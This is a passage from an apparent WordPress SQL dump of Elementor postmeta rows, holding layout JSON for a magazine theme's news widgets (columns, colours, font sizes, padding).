e\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1332,465,'_elementor_version','0.4'),(1340,472,'_elementor_edit_mode','builder'),(1341,472,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1342,472,'_elementor_version','0.4'),(1343,472,'_elementor_css','a:3:{s:4:\"time\";i:1508912730;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1344,473,'_elementor_edit_mode','builder'),(1345,473,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",